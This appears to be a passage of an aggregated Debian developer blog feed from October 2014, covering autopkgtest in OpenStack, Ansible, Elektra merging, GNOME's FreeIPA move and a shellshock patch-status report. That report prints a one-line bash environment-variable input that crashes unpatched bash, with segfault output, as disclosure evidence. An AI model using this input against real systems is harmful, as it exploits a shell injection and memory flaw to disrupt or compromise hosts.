Conclusion

So far, no productive code exists for this – I just have a proof-of-concept here. But I pretty much like the idea, and I am thinking about going further in that direction, since it allows deploying applications on the Linux desktop as well as deploying software on servers in a way which plays nice with the native package manager, and which does not duplicate much code (less risk of having not-updated libraries with security flaws around).

However, there might be issues I haven’t thought about yet. Also, it makes sense to look at GNOME to see how the whole “3rd-party app deployment” issue develops. In case I go further with Listaller-NEXT, it is highly likely that it will make use of the ideas sketched above (comments and feedback are more than welcome!).

10 October, 2014 12:59PM by Matthias

hackergotchi for Mario Lang

Mario Lang

GStreamer and the command-line?

I was recently looking for a command-line client for SoundCloud. soundCLI on GitHub appeared to be what I want. But wait, there is a problem with its implementation.

soundCLI uses gstreamer's playbin2 to play audio data. But that apparently requires $DISPLAY to be set.

So no, soundCLI is not a command-line client. It is a command-line client for X11 users.

Ahem.

A bit of research on Stackoverflow and related sites did not tell me how to modify playbin2 usage such that it does not require X11, while it is only playing AUDIO data.

What the HECK is going on here. Are the graphical people trying to silently overtake the world? Is Linux becoming the new Windows? The distinction between CLI and GUI has become more and more blurry in the recent years. I fear for my beloved platform.

If you know how to patch soundCLI to not require X11, please let me know. My current work-around is to replace all gstreamer usage with a simple "system" call to vlc. That works, but it does not give me comment display (since soundCLI doesn't know the playback position anymore) and hangs after every track, requiring me to enter "quit" manually on the VLC prompt. I really would have liked to use mplayer2 for this, but alas, mplayer2 does not support https. Oh well, why would it need to, in this day and age where everyone seems to switch to https by default. Oh well.

10 October, 2014 09:00AM by Mario Lang

hackergotchi for Martin Pitt

Martin Pitt

Running autopkgtests in the cloud

It’s great to see more and more packages in Debian and Ubuntu getting an autopkgtest. We now have some 660, and soon we’ll get another ~ 4000 from Perl and Ruby packages. Both Debian’s and Ubuntu’s autopkgtest runner machines are currently static manually maintained machines which ache under their load. They just don’t scale, and at least Ubuntu’s runners need quite a lot of handholding.

This needs to stop. To quote Tim “The Tool Man” Taylor: We need more power!. This is a perfect scenario to be put into a cloud with ephemeral VMs to run tests in. They scale, there is no privacy problem, and maintenance of the hosts then becomes Somebody Else’s Problem.

I recently brushed up autopkgtest’s ssh runner and the Nova setup script. Previous versions didn’t support “revert” yet, tests that leaked processes caused eternal hangs due to the way ssh works, and image building wasn’t yet supported well. autopkgtest 3.5.5 now gets along with all that and has a dozen other fixes. So let me introduce the Binford 6100 variable horsepower DEP-8 engine python-coated cloud test runner!

While you can run adt-run from your home machine, it’s probably better to do it from an “autopkgtest controller” cloud instance as well. Testing frequently requires copying files and built package trees between testbeds and controller, which can be quite slow from home and causes timeouts. The requirements on the “controller” node are quite low — you either need the autopkgtest 3.5.5 package installed (possibly a backport to Debian Wheezy or Ubuntu 12.04 LTS), or run it from git ($checkout_dir/run-from-checkout), and other than that you only need python-novaclient and the usual $OS_* OpenStack environment variables. This controller can also stay running all the time and easily drive dozens of tests in parallel as all the real testing action is happening in the ephemeral testbed VMs.

The most important preparation step to do for testing in the cloud is quite similar to testing in local VMs with adt-virt-qemu: You need to have suitable VM images. They should be generated every day so that the tests don’t have to spend 15 minutes on dist-upgrading and rebooting, and they should be minimized. They should also be as similar as possible to local VM images that you get with vmdebootstrap or adt-buildvm-ubuntu-cloud, so that test failures can easily be reproduced by developers on their local machines.

To address this, I refactored the entire knowledge how to turn a pristine “default” vmdebootstrap or cloud image into an autopkgtest environment into a single /usr/share/autopkgtest/adt-setup-vm script. adt-buildvm-ubuntu-cloud now uses this, you shold use it with vmdebootstrap --customize (see adt-virt-qemu(1) for details), and it’s also easy to run for building custom cloud images: Essentially, you pick a suitable “pristine” image, nova boot an instance from it, run adt-setup-vm through ssh, then turn this into a new adt specific "daily" image with nova image-create. I wrote a little script create-nova-adt-image.sh to demonstrate and automate this, the only parameter that it gets is the name of the pristine image to base on. This was tested on Canonical's Bootstack cloud, so it might need some adjustments on other clouds.

Thus something like this should be run daily (pick the base images from nova image-list):

  $ ./create-nova-adt-image.sh ubuntu-utopic-14.10-beta2-amd64-server-20140923-disk1.img
  $ ./create-nova-adt-image.sh ubuntu-utopic-14.10-beta2-i386-server-20140923-disk1.img

This will generate adt-utopic-i386 and adt-utopic-amd64.

Now I picked 34 packages that have the "most demanding" tests, in terms of package size (libreoffice), kernel requirements (udisks2, network manager), reboot requirement (systemd), lots of brittle tests (glib2.0, mysql-5.5), or needing Xvfb (shotwell):

  $ cat pkglist
  apport
  apt
  aptdaemon
  apache2
  autopilot-gtk
  autopkgtest
  binutils
  chromium-browser
  cups
  dbus
  gem2deb
  glib-networking
  glib2.0
  gvfs
  kcalc
  keystone
  libnih
  libreoffice
  lintian
  lxc
  mysql-5.5
  network-manager
  nut
  ofono-phonesim
  php5
  postgresql-9.4
  python3.4
  sbuild
  shotwell
  systemd-shim
  ubiquity
  ubuntu-drivers-common
  udisks2
  upstart

Now I created a shell wrapper around adt-run to work with the parallel tool and to keep the invocation in a single place:

$ cat adt-run-nova
#!/bin/sh -e
adt-run "$1" -U -o "/tmp/adt-$1" --- ssh -s nova -- \
    --flavor m1.small --image adt-utopic-i386 \
    --net-id 415a0839-eb05-4e7a-907c-413c657f4bf5

Please see /usr/share/autopkgtest/ssh-setup/nova for details of the arguments. --image is the image name we built above, --flavor should use a suitable memory/disk size from nova flavor-list and --net-id is an "always need this constant to select a non-default network" option that is specific to Canonical Bootstack.

Finally, let' run the packages from above with using ten VMs in parallel:

  parallel -j 10 ./adt-run-nova -- $(< pkglist)

After a few iterations of bug fixing there are now only two failures left which are due to flaky tests, the infrastructure now seems to hold up fairly well.

Meanwhile, Vincent Ladeuil is working full steam to integrate this new stuff into the next-gen Ubuntu CI engine, so that we can soon deploy and run all this fully automatically in production.

Happy testing!

10 October, 2014 07:25AM by pitti

October 09, 2014

Ingo Juergensmann

Buildd.Net: update-buildd.net v0.99 released

Buildd.Net offers a buildd centric view to autobuilder network such as previously Debians autobuilder network or nowadays the autobuilder network of debian-ports.org. The policy of debian-ports.org requires a GPG key for the buildd to sign packages for upload that is valid for 1 year. Buildd admins are usually lazy people. At least they are running a buildd instead of building those packages all manually. Being a lazy buildd admin it might happen that you miss to renew your GPG key, which will render your buildd unable to upload newly built packages.

When participating in Buildd.Net you need to run update-buildd.net, a small script that transmits some statistical data about your package building. I added now a GPG key expiry check to that script that will warn the buildd admin by mail and text on the Buildd.Net arch status page, such as for m68k. So, either your client updates automatically to the new version or you can download the script yourself.

Kategorie: 
 

09 October, 2014 07:29PM by ij

hackergotchi for Lisandro Damián Nicanor Pérez Meyer

Lisandro Damián Nicanor Pérez Meyer

Qt 5.3.2 in Wheezy-backports: just a few hours away

In more or less 24 hs a few days most of Qt 5.3.2 will be available as a Wheezy backport. That means that if you are using Debian stable you don't need to wait for Jessie: just wait a few hours, add wheezy-backports's repo to your sources.list and get it :)

The rest of Qt 5 will arrive soon.

This is the same version that will be shipped in Jessie, so whatever you develop with it will work with the next Debian stable release :)

Don't forget: you better start porting your Qt4 apps to Qt5!

Note 2014-10-10: uups, it will still take a few days, but it will be there soon :)

Note 2014-10-15: currently building!

09 October, 2014 06:50PM by Lisandro Damián Nicanor Pérez Meyer (noreply@blogger.com)

hackergotchi for Chris Lamb

Chris Lamb

London—Paris—London 2014

I've wanted to ride to Paris for a few months now but was put off by the hassle of taking a bicycle on the Eurostar, as well having a somewhat philosophical and aesthetic objection to taking a bike on a train in the first place. After all, if one already is possession of a mode of transport...

My itinerary was straightforward:

Friday 12h00
London → Newhaven
Friday 23h00
Newhaven → Dieppe (ferry)
Saturday 04h00
Dieppe → Paris
Saturday 23h00
(Sleep)
Sunday 07h00
Paris → Dieppe
Sunday 18h00
Dieppe → Newhaven (ferry)
Sunday 21h00
Newhaven → Peacehaven
Sunday 23h00
(Sleep)
Monday 07h00
Peacehaven → London

Packing list

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/01.jpg
  • Ferry ticket (unnecessary in the end)
  • Passport
  • Credit card
  • USB A male → mini A male (charges phone, battery pack & front light)
  • USB A male → mini B male (for charging or connecting to Edge 800)
  • USB mini A male → OTG A female (for Edge 800 uploads via phone)
  • Waterproof pocket
  • Sleeping mask for ferry (probably unnecessary)
  • Battery pack

Not pictured:

  • Castelli Gabba Windstopper short-sleeve jersey
  • Castelli Velocissimo bib shorts
  • Castelli Nanoflex arm warmers
  • Castelli Squadra rain jacket
  • Garmin Edge 800
  • Phone
  • Front light: Lezyne Macro Drive
  • Rear lights: Knog Gekko (on bike), Knog Frog (on helmet)
  • Inner tubes (X2), Lezyne multitool, tire levers, hand pump

Day 1: London → Newhaven

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/02.jpg

Tower Bridge.

Many attempt to go from Tower Bridge → Eiffel Tower (or Marble Arch → Arc de Triomphe) in less than 24 hours. This would have been quite easy if I had left a couple of hours later.
https://chris-lamb.co.uk/wp-content/2014/london-paris-london/03.jpg

Fanny's Farm Shop, Merstham, Surrey.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/04.jpg

Plumpton, East Sussex.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/05.jpg

West Pier, Newhaven.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/07.jpg

Leaving Newhaven on the 23h00 ferry.


Day 2: Dieppe → Paris

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/09.jpg

Beauvoir-en-Lyons, Haute-Normandie.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/10.jpg

Sérifontaine, Picardie.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/12.jpg

La tour Eiffel, Paris.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/13.jpg

Champ de Mars, Paris.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/15.jpg

Pont de Grenelle, Paris.


Day 3: Paris → Dieppe

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/18.jpg

Cormeilles-en-Vexin, Île-de-France.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/20.jpg

Gisors, Haute-Normandie.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/21.jpg

Paris-Brest, Gisors, Haute-Normandie.

Wikipedia: This pastry was created in 1910 to commemorate the Paris–Brest bicycle race begun in 1891. Its circular shape is representative of a wheel. It became popular with riders on the Paris–Brest cycle race, partly because of its energizing high caloric value, and is now found in pâtisseries all over France.
https://chris-lamb.co.uk/wp-content/2014/london-paris-london/22.jpg

Gournay-en-Bray, Haute-Normandie.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/23.jpg

Début de l'Avenue Verte, Forges-les-Eaux, Haute-Normandie.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/24.jpg

Mesnières-en-Bray, Haute-Normandie.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/26.jpg

Dieppe, Haute-Normandie.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/28.jpg

«La Mancha».


Day 4: Peacehaven → London

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/29.jpg

Peacehaven, East Sussex.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/31.jpg

Highbrook, West Sussex.

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/33.jpg

London weather.


Summary

https://chris-lamb.co.uk/wp-content/2014/london-paris-london/34.jpg
Distance
588.17 km
Pedal turns
~105,795

My only non-obvious tips would be to buy a disposable blanket in the Newhaven Co-Op to help you sleep on the ferry. In addition, as the food on the ferry is good enough you only need to get to the terminal one hour before departure, avoiding time on your feet in unpicturesque Newhaven.

In terms of equipment, I would bring another light for the 4AM start on «L'Avenue Verte» if only as a backup and I would have checked I could arrive at my Parisian Airbnb earlier in the day - I had to hang around for five hours in the heat before I could have a shower, properly relax, etc.

I had been warned not to rely on being able to obtain enough water en route on Sunday but whilst most shops were indeed shut I saw a bustling tabac or boulangerie at least once every 20km so one would never be truly stuck.

Route-wise, the surburbs of London and Paris are both equally dismal and unmotivating and there is about 50km of rather uninspiring and exposed riding on the D915.

However, «L'Avenue Verte» is fantastic even in the pitch-black and the entire trip was worth it simply for the silent and beautiful Normandy sunrise. I will be back.

09 October, 2014 05:19PM

hackergotchi for Jan Wagner

Jan Wagner

Updated Monitoring Plugins Version is coming soon

Three months ago version 2.0 of Monitoring Plugins was released. Since then many changes were integrated. You can find a quick overview in the upstream NEWS.

Now it's time to move forward and a new release is expected soon. It would be very welcome if you could give the latest source snapshot a try. You also can give the Debian packages a go and grab them from my 'unstable' and 'wheezy-backports' repositories at http://ftp.cyconet.org/. Right after the stable release, the new packages will be uploaded into Debian unstable. The whole packaging changes can be observed in the changelog.

Feedback is very appreciated via Issue tracker or the Monitoring Plugins Development Mailinglist.

Update: The official call for testing is available.

09 October, 2014 09:46AM

October 08, 2014

hackergotchi for Jonathan Dowland

Jonathan Dowland

Ansible

I've just recently built the large bulk of VMs that we use for first semester teaching. This year that was 112. We use the same general approach for these as our others: get a generic base image up and running, with just enough configuration complete so a puppet client starts up; get it talking to our master; let puppet take it from there.

There are pragmatic balances between how much we do in the kickstart versus how much we do in puppet, but also when we build a new VM from scratch versus when we clone an existing image, and how specialisation we do in the clone image.

Unfortunately this year we ended up in a situation where our clone image wouldn't talk to our puppet master out of the box, due to some changes we'd made to our master set up since the clone image was prepared. We didn't really have enough time to re-clone the entire set of VMs from a fixed base image, and instead needed to fix them whilst up. However we couldn't rely on puppet to do that, since they wouldn't talk to the puppet master.

We needed to manually reset the puppet client state per VM and then re-establish a trust relationship with the correct master (which is not the default master hostname in our environment anymore). Luckily, we deploy a local account with a known passphrase via the kickstart, which also has sudo access, as an interim measure before puppet strips it back out again and sets up proper LDAP and Kerberos authentication. So we can at least get into the boxes. However logging into 112 VMs by hand is not a particularly pleasant task.

In the past I might have tried to achieve this using something like clusterssh but this year I decided to give ansible a try instead.

Ansible started life, I believe, as a tool that would let you run arbitrary commands on remote hosts, including navigating ssh and sudo as required, without needing any agent software on the remote end. It has since seemed to grow into an enterprise product in its own right, seemingly in competition with puppet, chef, cfengine et al.

Looking at the Ansible website now I'd be rather put off by just how "enterprisey" it has become - much as I am by the puppet website, if I'm honest - but if you persevere past the webinars, testimonials, etc. etc., you can find yourself to the documentation, and running an arbitrary command is as simple as

  • defining a list of hosts
  • running an ansible command line referencing some or all of those hosts

The hosts file format is simple

[somehosts]
host1
host2
...
[otherhosts]
host3

The command line can be a little bit more complex, especially if you need to use one username for ssh, another for sudo, and you don't want to use ssh key auth:

ansible -i ./hostsfile somehosts -k -u someuser \
    --sudo -K -a 'puppet agent --onetime --no-daemonize --verbose’

"all" would work where I've used somehosts in the example above.

So there you go: using one configuration management system to bootstrap another. I'm sure I've reserved myself a special place in hell for this.

08 October, 2014 08:12PM

hackergotchi for Steve Kemp

Steve Kemp

Writing your own e-books is useful

Before our recent trip to Poland I took the time to create my own e-book, containing the names/addresses of people to whom we wanted to send postcards.

Authoring ebooks is simple, and this was a useful use. (Ordinarily I'd have my contacts on my phone, but I deliberately left it at home ..)

I did mean to copy and paste some notes from wikipedia about transport, tourist destinations, etc, into a brief guide. But I forgot.

In other news the toy virtual machine I hacked together got a decent series of updates, allowing you to embed it and add your own custom opcode(s) easily. That was neat, and fell out naturely from the switch to using function-pointers for the opcode implementation.

08 October, 2014 07:03PM

Elena 'valhalla' Grandi

New gpg subkey

The GPG subkey I keep for daily use was going to expire, and this time I decided to create a new one instead of changing the expiration date.

Doing so I've found out that gnupg does not support importing just a private subkey for a key it already has (on IRC I've heard that there may be more informations on it on the gpg-users mailing list), so I've written a few notes on what I had to do on my website, so that I can remember them next year.

The short version is:

* Create your subkey (in the full keyring, the one with the private master key)
* export every subkey (including the expired ones, if you want to keep them available), but not the master key
* (copy the exported key from the offline computer to the online one)
* delete your private key from your regular use keyring
* import back the private keys you have exported before.

08 October, 2014 06:42PM by Elena ``of Valhalla''

Ian Donnelly

A Comparison of Elektra Merge and Git Merge

Hi everybody,

We have gotten some inquires about how Elektra’s merge functionality compares to the merge functionality built into git: git merge-file. I am glad to say that Elektra outperforms git’s merge functionality in the same ways it outperforms diff3 when applied to configuration files. Obviously, git’s merge functionality does a much better job with source-code as that is not the goal of elektra. In that previous example, I showed that because diff3 is lined based, where Elektra is not (unless you mount a file using the line plugin). The example I used before, and I will go over again, is using smb.conf and in-line comments.

Many of our storage plug-ins understand the difference between comments and actual configuration data. So if a configuration file has an inline comment like so:
max log size = 10000 ; Controls the size of the log file (in KiB)
we can compare the actual Keys, value pairs between versions max log size = 10000 and deal with the comments separately.

As a result, if we have a base:
max log size = 1000 ; Size in KiB

Ours:
max log size = 10000 ; Size in KiB

Theirs:
max log size = 1000 ; Controls the size of the log file (in KiB)

The result using elektra-merge would be:
max log size = 10000 ; Controls the size of the log file (in KiB)

Just like diff3, git merge-file can only compare these lines as lines, and thus there is a conflict. When running git merge-file smb.conf.ours smb.conf.base smb.conf.theirs we get the following output showing a conflict:
<<<<<<< smb.conf.ours
max log size = 2000 ; Size in KiB
=======
max log size = 1000 ; Controls the size of the log file (in KiB)
>>>>>>> smb.conf.theirs

This really shows the strength of Elektra’s plugin system and why it makes merge an obvious use-case of Elektra. I hope this example makes it clear why using Elektra’s merge functionality is advantageous over git’s merge functionality. Once again I would like to stress the importance of quality storage plug-ins for Elektra. The more quality plugins we have the more powerful Elektra can be. If you are interested in plugins and would like to help us by adding functionality to Elektra by creating a new plug-in be sure to read my basic tutorial on how to do so.

Sincerely,
Ian Donnelly

08 October, 2014 06:02PM by Ian Donnelly

hackergotchi for EvolvisForge blog

EvolvisForge blog

PSA: #shellshock still unfixed except in Debian unstable

I just installed, for work, Hanno Böck’s bashcheck utility on our monitoring system, and watched all¹ systems go blue.

① All but two. One is not executing remote scripts from the monitoring for security reasons, the other is my desktop which runs Debian “sid” (unstable).

This means that all those distributions still have unfixed #shellshock bugs.

  • lenny (with Md’s packages): bash (3.2-4.2) = 3.2.53(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • squeeze (LTS): bash (4.1-3+deb6u2) = 4.1.5(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • wheezy (stable-security): bash (4.2+dfsg-0.1+deb7u3) = 4.2.37(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
    • CVE-2014-6278 (lcamtuf bug #2)
  • jessie (testing): bash (4.3-10) = 4.3.27(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
    • CVE-2014-6278 (lcamtuf bug #2)
  • sid (unstable): bash (4.3-11) = 4.3.30(1)-release
    • none
  • CentOS 5.5: bash-3.2-24.el5 = 3.2.25(1)-release
    • extra-vulnerable (function import active)
    • CVE-2014-6271 (original shellshock)
    • CVE-2014-7169 (taviso bug)
    • CVE-2014-7186 (redir_stack bug)
    • CVE-2014-6277 (lcamtuf bug #1)
  • CentOS 5.6: bash-3.2-24.el5 = 3.2.25(1)-release
    • extra-vulnerable (function import active)
    • CVE-2014-6271 (original shellshock)
    • CVE-2014-7169 (taviso bug)
    • CVE-2014-7186 (redir_stack bug)
    • CVE-2014-6277 (lcamtuf bug #1)
  • CentOS 5.8: bash-3.2-33.el5_10.4 = 3.2.25(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • CentOS 5.9: bash-3.2-33.el5_10.4 = 3.2.25(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • CentOS 5.10: bash-3.2-33.el5_10.4 = 3.2.25(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • CentOS 6.4: bash-4.1.2-15.el6_5.2.x86_64 = 4.1.2(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • CentOS 6.5: bash-4.1.2-15.el6_5.2.x86_64 = 4.1.2(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • lucid (10.04): bash (4.1-2ubuntu3.4) = 4.1.5(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
  • precise (12.04): bash (4.2-2ubuntu2.5) = 4.2.25(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
    • CVE-2014-6278 (lcamtuf bug #2)
  • quantal (12.10): bash (4.2-5ubuntu1) = 4.2.37(1)-release
    • extra-vulnerable (function import active)
    • CVE-2014-6271 (original shellshock)
    • CVE-2014-7169 (taviso bug)
    • CVE-2014-7186 (redir_stack bug)
    • CVE-2014-6277 (lcamtuf bug #1)
    • CVE-2014-6278 (lcamtuf bug #2)
  • trusty (14.04): bash (4.3-7ubuntu1.4) = 4.3.11(1)-release
    • CVE-2014-6277 (lcamtuf bug #1)
    • CVE-2014-6278 (lcamtuf bug #2)

I don’t know if/when all distributions will have patched their packages ☹ but thought you’d want to know the hysteria isn’t over yet…

… however, I hope you were not stupid enough to follow the advice of this site which suggests you to download some random file over the ’net and execute it with superuser permissions, unchecked. (I think the Ruby people were the first to spread this extremely insecure, stupid and reprehensible technique.)

Updates:

  • rsc points out that CentOS only supports 5.«latest» and 6.«latest», and paying RHEL get 5.«x».«y» but only occasionally. We updated one of the two systems in question and shut the other down due to lack of use.
  • trusty (14.04): bash (4.3-7ubuntu1.5) = 4.3.11(1)-release
    • none
  • Yes, comments on this blog are disabled; mail t.glaser@tarent.de for feedback.
  • Since I was asked (twice): the namespace patches by Florian Weimer protect from most exploits. The bugs are, nevertheless, present:
    root@debian-wheezy:~ # env 'BASH_FUNC_foo()=() { x() { _; }; x() { _; } <<'"$(perl -e '{print "A"x1000}'); }" bash -c :
    Segmentation fault
    139|root@debian-wheezy:~ # dmesg | tail -1
    [3121102.362274] bash[1699]: segfault at dfdfdfdf ip 00000000f766df36 sp 00000000ffe90b34 error 4 in libc-2.13.so[f75ee000+15d000]
     
  • To one eMail sender: If you do not understand why a CGI or something else could invoke a shell, or what a segmentation fault trap is, do not bother me. Especially not in that tone.
  • To another eMail sender: Yes, quantal is end of life. It’s also upgraded. First and last time I ever used *buntu’s “do-release-upgrade”. Broke kernel and GRUB, and upgraded to saucy. I manually “apt-get –purge dist-upgrade”d to trusty (went surprisingly well).
  • precise (12.04): bash (4.2-2ubuntu2.6) = 4.2.25(1)-release
    • none

Thanks to ↳ tarent for letting me do this work during $dayjob time!

08 October, 2014 01:57PM by Thorsten Glaser

hackergotchi for Jan Wagner

Jan Wagner

Updated Monitoring Plugins Version is coming soon

Three months ago version 2.0 of Monitoring Plugins was released. Since then many changes were integrated. You can find a quick overview in the upstream NEWS.

Now it's time to move forward and a new release is expected soon. It would be very welcome if you could give the latest source snapshot a try. You also can give the Debian packages a go and grab them from my 'unstable' and 'wheezy-backports' repositories at http://ftp.cyconet.org/. Right after the stable release, the new packages will be uploaded into Debian unstable. The whole packaging changes can be observed in the changelog.

Feedback is very appreciated via Issue tracker or the Monitoring Plugins Development Mailinglist.

08 October, 2014 11:27AM

hackergotchi for Michal Čihař

Michal Čihař

Wammu 0.37

It has been more than three years since last release of Wammu and I've decided it's time to push changes made in the Git repos to the users. So here comes Wammu 0.37.

The list of changes is not really huge, but in total that means 1470 commits in git (most of that are translations):

  • Translation updates (Indonesian, Spanish, ...).
  • Add export of contact to XML.
  • Add Get all menu option.
  • Added appdata metadata.

I will not make any promises for future releases (if there will be any) as the tool is not really in active development.

Filed under: English Gammu Wammu | 0 comments | Flattr this!

08 October, 2014 10:00AM by Michal Čihař (michal@cihar.com)

October 07, 2014

hackergotchi for Thorsten Glaser

Thorsten Glaser

mksh R50d released

The last MirBSD Korn Shell update broke update-initramfs because I accidentally introduced a regression in field splitting while fixing other bugs – sorry!

mksh R50d was just released to fix that, and a small NULL pointer dereference found by Goodbox on IRC. Thanks to my employer tarent for a bit of time to work on it.

07 October, 2014 03:54PM by MirOS Developer tg (tg@mirbsd.org)

hackergotchi for Joachim Breitner

Joachim Breitner

New website layout

After 10 years I finally got around to re-decorating my website. One reason was ICFP, where just too many people told me that I don’t look like on my old website any more (which is very true). Another reason was that I was visting my brother, who is very good at web design (check out his portfolio), who could help me a bit.

I wanted something practical and maybe a bit staid, so I drew inspiration from typical Latex typography, and also from Edward Z. Yang’s blog: A serif font (Utopia) for the main body, justified and hyphenated text. Large section headers in a knobbly bold sans-serif font (Latin Modern Sans, which reasonably resembles Computer Modern). To intensify that impression, I put the main text on a white box that lies – like a paper – on the background. As a special gimmic the per-page navigation (or, in the case of the blog, the list of categories) is marked up like a figure in a paper.

Of course this would be very dire without a suitable background. I really like the procedural art by Jared Tarbell, espcially substrate and interAggregate. Both have been turned into screensavers shipped with xscreensaver, so I hacked the substrate code to generate a seamless tile and took a screenshot of the result. I could not make up my mind yet how dense it has to be to look good, so I for every page I randomly pick one of six variants randomly for now.

I simplified the navigation a bit. The old News section has been removed recently already. The Links section is gone – I guess link lists on homepages are so 90s. The section Contact and About me are merged and awaiting some cleanup. The link to the satire news Heisse News is demoted to a mention on the Contents section.

This hopefully helps to make the site navigatable on mobile devices (the old homepage was unusable). CSS media queries adjust the layout slightly on narrow screens, and separately for print devices.

Being the nostaltic I am, I still keep the old design, as well as the two designs before that, around and commented their history.

07 October, 2014 03:40PM by Joachim Breitner (mail@joachim-breitner.de)

ghc-heap-view for GHC 7.8

Since the last release of ghc-heap-view, which was compatible with GHC-7.6, I got 8 requests for a GHC-7.8 compatible version. I started working on it in January, but got stuck and then kept putting it off.

Today, I got the ninths request, and I did not want to wait for the tenth, so I finally finished the work and you can use the new ghc-heap-view-0.5.2 with GHC-7.8.

I used this chance to migrate its source repository from Darcs to git (mirrored on GitHub), so maybe this means that when 7.10 comes out, the requests to update it come with working patches :-). I also added a small test script so that travis can check it: ghc-heap-view

I did not test it very thoroughly yet. In particular, I did not test whether ghc-vis works as expected.

I still think that the low-level interface that ghc-heap-view creates using custom Cmm code should move into GHC itself, so that it does not break that easily, but I still did not get around to propose a patch for that.

07 October, 2014 01:55PM by Joachim Breitner (mail@joachim-breitner.de)

hackergotchi for Andrea Veri

Andrea Veri

The GNOME Infrastructure is now powered by FreeIPA!

As preannounced here the GNOME Infrastructure switched to a new Account Management System which is reachable at https://account.gnome.org. All the details will follow.

Introduction

It’s been a while since someone actually touched the underlying authentication infrastructure that powers the GNOME machines. The very first setup was originally configured by Jonathan Blandford (jrb) who configured an OpenLDAP istance with several customized schemas. (pServer fields in the old CVS days, pubAuthorizedKeys and GNOME modules related fields in recent times)

While OpenLDAP-server was living on the GNOME machine called clipboard (aka ldap.gnome.org) the clients were configured to synchronize users, groups, passwords through the nslcd daemon. After several years Jeff Schroeder joined the Sysadmin Team and during one cold evening (date is Tue, February 1st 2011) spent some time configuring SSSD to replace the nslcd daemon which was missing one of the most important SSSD features: caching. What surely convinced Jeff to adopt SSSD (a very new but promising sofware at that time as the first release happened right before 2010’s Christmas) and as the commit log also states (“New sssd module for ldap information caching”) was SSSD’s caching feature.

It was enough for a certain user to log in once and the ‘/var/lib/sss/db’ directory was populated with its login information preventing the LDAP daemon in charge of picking up login details (from the LDAP server) to query the LDAP server itself every single time a request was made against it. This feature has definitely helped in many occasions especially when the LDAP server was down for a particular reason and sysadmins needed to access a specific machine or service: without SSSD this wasn’t ever going to work and sysadmins were probably going to be locked out from the machines they were used to manage. (except if you still had ‘/etc/passwd’, ‘/etc/group’ and ‘/etc/shadow’ entries as fallback)

Things were working just fine except for a few downsides that appeared later on:

  1. the web interface (view) on our LDAP user database was managed by Mango, an outdated tool which many wanted to rewrite in Django that slowly became a huge dinosaur nobody ever wanted to look into again
  2. the Foundation membership information were managed through a MySQL database, so two databases, two sets of users unrelated to each other
  3. users were not able to modify their own account information on their own but even a single e-mail change required them to mail the GNOME Accounts Team which was then going to authenticate their request and finally update the account.

Today’s infrastructure changes are here to finally say the issues outlined at (1, 2, 3) are now fixed.

What has changed?

The GNOME Infrastructure is now powered by Red Hat’s FreeIPA which bundles several FOSS softwares into one big “bundle” all surrounded by an easy and intuitive web UI that will help users update their account information on their own without the need of the Accounts Team or any other administrative entity. Users will also find two custom fields on their “Overview” page, these being “Foundation Member since” and “Last Renewed on date”. As you may have understood already we finally managed to migrate the Foundation membership database into LDAP itself to store the information we want once and for all. As a side note it might be possible that some users that were Foundation members in the past won’t find any detail stored on the Foundation fields outlined above. That is actually expected as we were able to migrate all the current and old Foundation members that had an LDAP account registered at the time of the migration. If that’s your case and you still would like the information to be stored on the new setup please get in contact with the Membership Committee at stating so.

Where can I get my first login credentials?

Let’s make a little distinction between users that previously had access to Mango (usually maintainers) and users that didn’t. If you were used to access Mango before you should be able to login on the new Account Management System by entering your GNOME username and the password you were used to use for loggin in into Mango. (after loggin in the very first time you will be prompted to update your password, please choose a strong password as this account will be unique across all the GNOME Infrastructure)

If you never had access to Mango, you lost your password or the first time you read the word Mango on this post you thought “why is he talking about a fruit now?” you should be able to reset it by using the following command:

ssh -l yourgnomeuserid account.gnome.org

The command will start an SSH connection between you and account.gnome.org, once authenticated (with the SSH key you previously had registered on our Infrastructure) you will trigger a command that will directly send your brand new password on the e-mail registered for your account. From my tests seems GMail sees the e-mail as a phishing attempt probably because the body contains the word “password” twice. That said if the e-mail won’t appear on your INBOX, please double-check your Spam folder.

Now that Mango is gone how can I request a new account?

With Mango we used to have a form that automatically e-mailed the maintainer of the selected GNOME module which was then going to approve / reject the request. From there and in the case of a positive vote from the maintainer the Accounts Team was going to create the account itself.

With the recent introduction of a commit robot directly on l10n.gnome.org the number of account requests reduced its numbers. In addition to that users will now be able to perform pretty much all the needed maintenance on their accounts themselves. That said and while we will probably work on building a form in the future we feel that requesting accounts can definitely be achieved directly by mailing the Accounts Team itself which will mail the maintainer of the respective module and create the account. As just said the number of account creations has become very low and the queue is currently clear. The documentation has been updated to reflect these changes at:

https://wiki.gnome.org/AccountsTeam
https://wiki.gnome.org/AccountsTeam/NewAccounts

I was used to have access to a specific service but I don’t anymore, what should I do?

